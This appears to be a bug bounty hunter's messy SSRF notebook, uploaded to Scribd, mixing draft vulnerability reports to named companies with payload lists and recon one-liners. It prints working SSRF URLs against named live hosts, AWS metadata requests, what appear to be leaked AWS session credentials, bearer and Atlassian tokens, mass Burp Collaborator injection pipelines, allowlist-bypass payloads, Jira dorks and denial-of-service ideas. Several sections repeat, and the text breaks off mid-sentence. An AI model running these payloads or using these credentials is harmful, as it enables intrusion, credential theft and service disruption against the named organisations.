Scribd
Upload
237 views23 pages

Ssrffinal

An internal server-side request forgery (SSRF) vulnerability was found in the subdomain images.shopper.ipsy.com that could allow port scanning and disclosure of internal AWS metadata. The vulnerability stems from the ability to append arbitrary URLs to the endpoint, including internal localhost addresses. This enables an attacker to scan internal ports and retrieve credentials by making requests to the AWS metadata URL. The report provides details on reproducing the port scanning and a proof of concept using Burp Collaborator to verify the internal SSRF.

Uploaded by

Aneesh D
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
237 views23 pages

Ssrffinal

An internal server-side request forgery (SSRF) vulnerability was found in the subdomain images.shopper.ipsy.com that could allow port scanning and disclosure of internal AWS metadata. The vulnerability stems from the ability to append arbitrary URLs to the endpoint, including internal localhost addresses. This enables an attacker to scan internal ports and retrieve credentials by making requests to the AWS metadata URL. The report provides details on reproducing the port scanning and a proof of concept using Burp Collaborator to verify the internal SSRF.

Uploaded by

Aneesh D
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 23

SSRF

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://
farm1.staticflickr.com@615pcsnienat67065o6uulidm4swgl.burpcollaborator.net/
175/455279239_720dfc98c8.jpg

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:


1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080,22,21,25 and see the response

80
image.png
image.png

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:


https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-
data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" :
"IQoJb3JpZ2luX2VjEMH//////////wEaCXVzLWVhc3QtMSJHMEUCIQDngpLHpcc0SUbQRcvq1+YWoIkIgx
ub2xYC2XLjbjpMAgIgIxoyoPHR+D9+h+dZqDbh5VmfP0BhOZpsA040nDcOSpkqgwQI6v//////////
ARADGgwwNzcxODkzMjgzMDMiDMXFebMKEq8i7UrFnCrXAw2EI4Uq6KcUeSJ/
6hx+TdeALNPSp+rUZGEZxSXEVcgDbeUbaitQpQiD+0IlzlMfCdyKEx2EVLy6boKMNZp8WUqiNQ9l6m7WQwh
JQZpNoIq9R0Z8xbLPb1nqekNsw0g/8M91+4E7padeMeluSaY8eRPB0kHYoV3dX6Q7hmwPr65EA3/
PSiyr847ALsmgFiCWe5x2pUwp7J9ACKH1S9an4Ins8XUtCboGdKS1IOjSPcL1cQdkoanBv/
g74jHYEyLZO9vQ3PKMvDTpGTlsCkIk0gIofPrYjuUs7bWhMkZK4hfkdiv3/
q5fqN+K6B2CXMkIf6guHuxcmAYn+ro9dGYrkbmxUBIEVvSmfZbmQJ6xJpiletRxQC+EMcI/7ykrQ/
X9MU+4I2AzmA9nOqURJH5F+8BK96etpf4aLYn2FviolQ7JrzLAEnJyawAjbfZ2v0azQOEYeJ8AP9h6akGQT
mwDIp4Yaj6YYqyZQfOkVW8yLSH06gWPcT/7BUAnTWvAQpMSa5S4NEexgF2kZZS9FpPzFHvrRE/
SeVENP+JsmJBbQpVAFpN4gBwYPm2sll35ckyuvcddJ5WpbOK61jwRkYzvwTU2HLeRh9j2ec9qjTUt4DihE3
8d0++TojCHgNSPBjqlAZ7W3iRIZvN6MXnYgHwSkJa8Cq6IZRHT2N1AhKilXRu8F/
i+AKtJc3WX3V8QoccFV4BTavfcSWUPOIAyJFgWfAhFLziVixWh4egkUu4mox6fx32Ggbi3BVTQoww7oODkW
tdIX4U4hjwDPJj2Kah7q93Wi0I492t7gK2ymakQtvpgAT4f2kpflSshtRbrxqN7yIgrpoL0iaIs3h6P6Emd
Wc9QZayKUw==",
"Expiration" : "2022-01-29T15:02:44Z"
}

Hello knaw team,

I aditya found security issue in your system where SSRF is leading to port scan

Title: Internal SSRF to scan ports and force to make HTTP request

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Steps:
1. Open URL https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
On port 8080 its giving instant response
2.https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:80/jp2/14759615811661.jp2
Its giving slow response or taking time to response
3. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
Changed localhost to 127.0.0.1 , 0.0.0.0 , [::]
4. Capture URL in burp suite > Send to intruder
5. Add port position as attacking position "8080"
6. Go to payloads > numbers > from 1 to 10000 | step 1 = Start attack
7. Observe the response where port 8080 is giving 200 OK and remaining are giving
404 etc
Impact:
As an attacker I am able to perform port scan internally , localhost payloads
working (Blacklist payload) . Able to induce server to make HTTP request on
different ports like 8080,443,80(DNS)
POC:

image.png

502
503

SSRF automation

subfinder -d target.com | httpx | tee subs.txt | sleep 3600; | cat subs.txt |


waybackurls | tee data.txt | sleep 3600; | cat data.txt | gf ssrf | tee ssrf.txt

cat data.txt | grep "=" | qsreplace


"hj4w5jlbpl95sx2i9wmip1o9r0xrlg.burpcollaborator.net" | tee ssrf.txt; ffuf -c -w
ssrf.txt -u FUZZ

Keywords for SSRF

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Payload crafting

1. subs valid
2. getting wayback urls | valid urls
3. cat waybackurls | gf

cat wayback | gf ssrf | tee ssrftest.txt

cat ssrftest.txt | grep "=" | qsreplace


"https://3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net" | tee ssrf.txt

cat ssrf.txt | httpx -sc

https://clickjacker.io/?refer=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://clickjacker.io/test?url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://www.clickjacker.io/test?
url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net

BB-TIP

echo minddesign.co.uk | gau | tee test


cat test | gf sqli | tee sqlitest
cat sqlitest | grep "=" | qsreplace "'" | tee final

GF Installation

1. go get -u github.com/tomnomnom/gf
2. echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >>
~/.bashrc
3. mkdir .gf
4. cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf
5. git clone https://github.com/1ndianl33t/Gf-Patterns

echo 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud | waybackurls | grep "="


| qsreplace "http://169.254.169.254/latest" |

proxy=
page=
img=
red=
url=
APIPA: 169.254.169.254

payload:

http://169.254.169.254/latest
https://169.254.169.254/latest
169.254.169.254/latest

SSRF

1. HTTP req is imp


2. DNS is no use
3. HTTP req , Sometimes its no use - IP yours = no ssrf , IP third party - NA

paypal - aws , gcp

Aditya PC [malicous acitivity] = Aryan PC

attacker.com - target.com

sales.dell.com/api/us/imgurl=https://evil.com/aditya.xml

USE
1. Collaborator
2. Repeater
3. Intruder

1.Detetction

http

EXPLOIT
1. Cross port scan p3
80 HTTP - OPEN
443 HTTP - OPEN
22 Filtered / Closed
21 Mo req - Clsoed
3306 DNS
25 SMTP - OPEN
8000
8443

PASTE URL fucntion is vulnerable for SSRF leads to cross port scan

2. File over port + DOS p4 p1


POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/116.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 140
Referer: https://app.short.io/
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImVlOTU5MzcxLTZmMGQtNDQzZS04OTFhLTJlNj
A1ZTZjMDJiZCIsInVzZXJfaWQiOjEwMjE2NjgsImVtYWlsIjoieWNmZ3ZqaGJrQGdtYWlsLmNvbSIsImxvZ
2luSGlzdG9yeUlkIjoiMTRiMzU1ZGMtZjUzMC00NzI2LTk5NmYtNmRhNDc0ZjZmYmYxIiwiaW1wZXJzb25h
dGUiOmZhbHNlLCJpYXQiOjE2OTEyMzAzNjIsImV4cCI6MTY5MzgyMjM2MiwiaXNzIjoiYXV0aG9yaXplciJ
9.WDd0Nt_WYeNXNg_se82pmMP5GaOkuXBZWf-Knaz6Xow
Connection: close

{"originalURL":"wzzd95ogm3ehqi0na2v3y2olhcn2br.burpcollaborator.net:443/
admin","domain":"arnk.short.gy","source":"website","allowDuplicates":true}

1.1 Clear all position


1.2 url:443/admin - add admin as attack pos
1.3 Go to payloads
1.4 Add from list
1.5. Server side variable names > Start attack

3. Backend system scan p2


4. Whitelist bypass p2 p1
5. AWS metadata retrive P1

Where check

1. POST req
GET request

ADD image
Add link , URL
Add data - bio , name , last name
Headers
Update link

AJdAgnqCST4iPtnUxiGtTz

curl -X POST \
-d url="https://9mwt039uxglj13wwecrd5u8klbr1fq.burpcollaborator.net/aditya.png"
\
"https://www.filestackapi.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

===================================================================================
================================================================================
https://tomcat.tiler01.huygens.knaw.nl/

Where
1. Register Form : 100
2. Feedback Form : 100 GB | 50*50 GB = 50 GB
3. Comments : 100
4. File Upload : 100
5. Contact Us : 50

Impact:
1. Service will down
2. Other legit users cant send feedback
3. Backend Crash
4. Service will slow

TA:
Session : 1
Cookies : 1
Headers : 1
Values : 1
Parameters : 1
Payload :

5MB = 1 Form

As an attacker 20k

20000*5
1000000

100GB

Jsfuck

Payload:

How much Time : 3000 to 5000 time

Status Code :
501
502
503

4 GB = 2GB

GTA 5 65 GB

P2

+++++++++++++++++++++++++++++++

Comment Injection EXT SSRF

Where we can comment = article , post , image , blogs , forums , reply , reviews

Burp Collaborator

<p>Sorry! New URL is: <a


href="https://shorturl.at/dtDEU">https://google.com</a></p>
Aditya = kongsec.io

Hi team,

Aditya here found insecure function exploitation on app.october.eu

Bug: Business logic vulnerability in invite function leads to victim response


fetching via email of october.eu

While testing I found behavior in invite


function that sends hook mail to
which we put in email section. Whenever we
get email it shows NAME and some data. I used
Burp_Collaborator_Link.net" So I got mail which
was showing link
Burp_Collaborator_Link.net and the link is in
blue part so once who click on It will fetch
response of that person or victim. Main point is
Ifl registers the form with email of victim and
hit send it ill send mail on victim email
address via october address

How it will impact victim ?

Hacker will use email id of victim for invite


process. In every section hacker will use
collaborator link or grabbing link and registered
with victim email address. Victim will receive
mail with link once user interacted with link hacker will
get response in POLL

Business impact:

Normal user will think he got mail from october.eu but as we know function dont
have security to verify invite . So it will harm multiple users on behalf on
october.eu

Bug verified by other company also.

I hope you will patch it soon

sub.samsung.com = IP aws

1. HTTP is important | DNS = no use


2. Not every HTTP is SSRF
3. HTTP IP = if its yours then no SSRF

Always Exploit

market.nokia.com = IP =
SSRF:
External : Third Party service : Aws , gcp ,
Internal : Sys based, IP based , Network based

https://site.com/index/profile?img=https://site.sub.com/image.png

Where
Register Form : Name , Last name
Profile Bio
Headers
Add or insert Link
Check URL
Verify URL

How
1. Burp Collaborator
2. CollaboratorEverywhere

X-Forwarded-For:

Detection

HTTP://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net
HTTPS://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net

Request:
POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/55.0.2883.87 Safari/537.36
[email protected]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 146
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjQ2NDc4YmE2LTI5MDUtNDc2MC1iM2I1LTE5ND
hiMmE2ZGMyZCIsInVzZXJfaWQiOjM1Mzk3NywiZW1haWwiOiJoa2RzYmZoZGJAZ21haWwuY29tIiwibG9na
W5IaXN0b3J5SWQiOiI0YzM2ZGZjMy03NDM4LTQzNDktYjJlMi00Mjk0YWZhYWIyODQiLCJpYXQiOjE2NDI4
NDc3NjIsImV4cCI6MTY0NTQzOTc2MiwiaXNzIjoiYXV0aG9yaXplciJ9.FUUuuEEpd84ydIMg2IBr3AIT-
bippT9yXrG92MgjQeA
Referer: http://dizklt08ztnal2blf8fadgi27tdkblza.burpcollaborator.net/ref
Connection: close
Cache-Control: no-transform
CF-Connecting_IP: spoofed.l9vsc1rgq1eica2t6g6i4o9ay14s2pqe.burpcollaborator.net
Client-IP: spoofed.gcwnfwubtwhdf55o9b9d7jc51w7n5lta.burpcollaborator.net
X-Wap-Profile: http://llaso13g21qioaetigiigolaa1gser2g.burpcollaborator.net/wap.xml
True-Client-IP: spoofed.0pq7sg7v6guxspi8mvmxk3ppegk7i76w.burpcollaborator.net
X-Real-IP: spoofed.hg1ojxycxxlej69pdcdebkg65xbo9qxf.burpcollaborator.net
X-Forwarded-For: spoofed.kj7rm01f00ohm9csgfghenj980ercu0j.burpcollaborator.net
From: [email protected]
Contact: [email protected]
X-Originating-IP: spoofed.lmbsp14g31ripaftjgjihomab1hsgi47.burpcollaborator.net
Forwarded:
for=spoofed.0fg7igxvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;by=spoofed.0fg7ig
xvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;host=spoofed.0fg7igxvwgkxip88cvcxa3
fp4ga79yxn.burpcollaborator.net
X-Client-IP: spoofed.z5568fnumfaw8oy72u2w025ouf06zzno.burpcollaborator.net

{"originalURL":"http://
68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:25","domain":"344r.short.gy","s
ource":"website","allowDuplicates":true}
Exploit
1. Port Scan P3 400 - 950
Open : HTTP
Closed : Nothing/DNS

80
21
22
25
8443
443
8080
3306

34.229.82.105

200 Ports

10 OPEN
190 closed

2. File over port


3. Backend System/machine Scan
4. CDN-CGI exploit
Wayback
5. AWS SSRF exploit
6. SSRF to Dos :
{"originalURL":"http://68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:7/
index"} 1000 PORTS 502
7. Whitelist Bypass
65535 = 40535
20000 OPEN
[{"data":{"linkPostPreview":{"status":"PROCESSING","preview":null}}}]

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://farm1.staticflickr.com/177/443368970_2550c05bd5.jpg

WhiteList

#
@
.

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://
farm1.staticflickr.com.e3izhgppp50o5ys99mc7dou4nvtmhb.burpcollaborator.net/
177/443368970_2550c05bd5.jpg

https://
farm1.staticflickr.com.6jqrx85h5xgglq81pesztgaw3n9hx6.burpcollaborator.net/
177/443368970_2550c05bd5.jpg

https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/
rotate=deg:exif/resize=width:210/output=quality:70/compress/https://
process.fs.grailed.com@r2ucgto2oiz14brm8zbkc1thm8s6gv.burpcollaborator.net/
4srXcOuSkGLoFEAQb6Uk

burplink.net::8080 123.45.67.89 nmap IP 8080 443

X-Forwarded-For: http://burplink.net::

burplink.net::[22]:1

8080,22,25,443,3306

{profile_uri:http://burplink.net}

127.0.0.1
0.0.0.0
localhost
127.1/Admin
double encoding URl

http://developer.blackberry.com/devzone/files/burplink.net/design/bb10/
Wireframe_Slides_BB10_3.ppt

Dorks for testing:

https://www.google.com/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=2ahUKEwjktcGvvd3oAhXg4jgGHY
ctAaUQFjAAegQIAxAB&url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fdex.hu%2Fx.php%3Fid
%3Dtotalcar_magazin_cikklink%26url%3Dhttp%253A%252F%252Fen.wikipedia.org%252Fwiki
%252FUniform_Resource_Identifier&usg=AOvVaw0jWeJNWIgR8eM65PmT9lqa

https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://
169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-
instance

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
latest/meta-data/iam/security-credentials/flaws/

https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fgoogle.com
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fgoogle.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F
%2Fgoogle.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fgoogle.com

tesla.com/site/verify?uri=http://[email protected]

http://www.opensource.apple.com/source/files/files-599.15/Library/Documentation/
Acknowledgements.rtf

inurl:"/plugins/servlet/oauth/users/icon-uri?consumerUri="
http://jira.exeliatech.com:8000/plugins/servlet/oauth/users/icon-uri?
consumerUri=http://127.0.0.1

http://i.dell.com/sites/doccontent/shared-content/data-sheets/fr/Documents/http://
127.0.0.1/

/admin/data?id=

inurl:"/admin/data?id=532"

inurl:return =https

inurl:url=http

inurl:u=https

inurl:u=http

inurl:redirect?https

inurl:redirect?http

inurl:redirect=https

inurl:redirect=http

inurl:link=http

127.0.0.1 db url

%23e=octet

site.com/index/user/api?file=https://sub.site.com/abc.pdf

External SSRF
Internal SSRF

Where ?
Register : Name , Last name
Insert URL
Add URL
Verify URL
Paramaters

If IP is yours then its not SSRF


NOT evry HTTP IP is SSRF

Always exploit

Port Scan

If port is open = HTTP request in collaborator


If port is closed = DNS or nothing

AWS Metadata SSRF

Detection : WHOISIP

IP = AWS , GCP , DO etc

Function : Insert URL

SSRF IP = AWS

APIPA range = http://169.254.169.254/latest/meta-data

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://farm1.staticflickr.com/10/15574189_44735baed9.jpg

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:


1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080,22,21,25 and see the response

80
image.png
image.png

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:

https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-
data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" :
"IQoJb3JpZ2luX2VjEMH//////////wEaCXVzLWVhc3QtMSJHMEUCIQDngpLHpcc0SUbQRcvq1+YWoIkIgx
ub2xYC2XLjbjpMAgIgIxoyoPHR+D9+h+dZqDbh5VmfP0BhOZpsA040nDcOSpkqgwQI6v//////////
ARADGgwwNzcxODkzMjgzMDMiDMXFebMKEq8i7UrFnCrXAw2EI4Uq6KcUeSJ/
6hx+TdeALNPSp+rUZGEZxSXEVcgDbeUbaitQpQiD+0IlzlMfCdyKEx2EVLy6boKMNZp8WUqiNQ9l6m7WQwh
JQZpNoIq9R0Z8xbLPb1nqekNsw0g/8M91+4E7padeMeluSaY8eRPB0kHYoV3dX6Q7hmwPr65EA3/
PSiyr847ALsmgFiCWe5x2pUwp7J9ACKH1S9an4Ins8XUtCboGdKS1IOjSPcL1cQdkoanBv/
g74jHYEyLZO9vQ3PKMvDTpGTlsCkIk0gIofPrYjuUs7bWhMkZK4hfkdiv3/
q5fqN+K6B2CXMkIf6guHuxcmAYn+ro9dGYrkbmxUBIEVvSmfZbmQJ6xJpiletRxQC+EMcI/7ykrQ/
X9MU+4I2AzmA9nOqURJH5F+8BK96etpf4aLYn2FviolQ7JrzLAEnJyawAjbfZ2v0azQOEYeJ8AP9h6akGQT
mwDIp4Yaj6YYqyZQfOkVW8yLSH06gWPcT/7BUAnTWvAQpMSa5S4NEexgF2kZZS9FpPzFHvrRE/
SeVENP+JsmJBbQpVAFpN4gBwYPm2sll35ckyuvcddJ5WpbOK61jwRkYzvwTU2HLeRh9j2ec9qjTUt4DihE3
8d0++TojCHgNSPBjqlAZ7W3iRIZvN6MXnYgHwSkJa8Cq6IZRHT2N1AhKilXRu8F/
i+AKtJc3WX3V8QoccFV4BTavfcSWUPOIAyJFgWfAhFLziVixWh4egkUu4mox6fx32Ggbi3BVTQoww7oODkW
tdIX4U4hjwDPJj2Kah7q93Wi0I492t7gK2ymakQtvpgAT4f2kpflSshtRbrxqN7yIgrpoL0iaIs3h6P6Emd
Wc9QZayKUw==",
"Expiration" : "2022-01-29T15:02:44Z"
}
==============
keyword: lout

EP: jira/projects

Summary: Atlassian token disclosure and crafting nested queries with internal port
scan as SSRF may leads to application level DOS

Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user
[email protected]:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_8ad836cdf79bba5c679a48e0d92f5fbe57b7cb0e_lout

2. I got this token from burpsuite spidering of accredible.atlassian.net

3. Now run this curl -v https://accredible.com:22 --user


admin@accredible .atlassian.net:e682d3ad-26d0-4cc1-8dc4-
91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

We can see the time delay on port change 80,8080 giving instant response but 22
port giving late reponse

Browser/OS: NA/ Firefox

Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might


result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.

When we check command on 80,8080 port it gives speedy response but on port 22 it
gives late response . It means 22 closed. If hacker perform this attack like port
scan then this may leads to DOS

I got token while crawling whole web app or else simple method is that we can check
source code on following endpoint-- https://accredible.atlassian.net/projects

Steps to reproduce issue:


1. Check source code of https://accredible.atlassian.net/projects
2. Search for "atlassian-token"
3. Atlassian token can be used for crafting nested queries but I escalated this to
SSRF port scan
4. Syntax for crafting next queries : curl -v https://mainhost.com --user
[email protected]:atlassian_token_here_lout

Exploit command:
1. On port 80
curl -v https://accredible.com:80 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

It crafted queries and gives us valid response , We can say instant response
image.png

2. On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me response after 1 min 45 seconds :" failed to connect on port 22"
image.png

3. On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me response which was instant with crafted queries

Command is curl -v https://accredible.com:443 --user


[email protected]:9c0fc891-2e3b-49d4-a94d-
6e2a409d1daf_711d800a83753ef92686d0ed61fd2b8a4cfb41d6_lout

Also I tried same command with port 3306 it takes a long time

Impact: The first part is , It gives instant response on open port and when I try
with closed port like 3306,22 it takes long to craft queries

So If hacker try same attacks on closed ports so the command will force a server to
craft queries because of a closed port it's not going to craft it . Performing same
attack on closed ports to craft queries will make server engage and this may leads
to DOS attack.

curl -v https://accredible.com:80 --user [email protected]:e682d3ad-


26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
===============================================

Hi team,

I found JQL injection in https://wiki.eveoh.nl

Description
The JQL query in our case limits the data to one project and a specific (and rather
short) time range (the current month). This restriction is hard-coded and should
not change. However, a crafted user value allows us to remove this limitation:
Martin Schneider' OR created < '2021-01-01
Now the query becomes
project = TeamA AND created > startOfMonth() AND assignee = 'Martin Schneider' OR
created < '2021-01-01'
will fetch all tickets from all projects of the entire JIRA instance!

How to reproduce
Go to https:// wiki.eveoh.nl /issues/?jql=
in jql paramter put any heavy load crafted payload
And perform attack multiple times
attack vector is to craft JQL queries with bad performance and thus long runtime. I
didn’t explore this in detail, but it’s easy to imagine that queries using JQL
functions, especially custom ones, can be designed to become quite expensive. JIRA
has some safeguards in place, but this might still open an attack vector to perform
DoS attacks by sending multiple such queries at the same time.

Solution
As a security threat, JQL injection is far from being on the same level as SQL
injection. However, there are ways an attacker can exploit it. It is important to
understand under which circumstances it poses a threat and how to prevent it.
With security, having multiple layers of protection is a fundamental principle. In
my opinion, input sanitisation should always be one of them.

======================

Hi team,

Aditya here found unauthorised access on demo server


URL: https://jira.typo3.com/servicedesk/customer/user/signup

image.png

CVE 2019-14994 based bug hitting your service based applications Vulnerable This
advisory discloses a critical severity security vulnerability. Versions of Jira
Service Desk Server and Data Center are affected by this vulnerability. Customers
who have downloaded and installed affected versions of Jira Service Desk Server and
Data, please upgrade your Jira Service Desk Server and Data Center installations
immediately to fix this vulnerability. By design, Jira Service Desk gives customer
portal users permissions only to raise requests and view issues. This allows users
to interact with the customer portal without having direct access to Jira. These
restrictions can be bypassed by a remote attacker with portal access who exploits a
path traversal vulnerability. Exploitation allows an attacker to view all issues
within all Jira projects contained in the vulnerable instance. This could include
Jira Service Desk projects, Jira Core projects, and Jira Software projects. Impact
Attacker can raise unlimited issues. Note that attackers can grant themselves
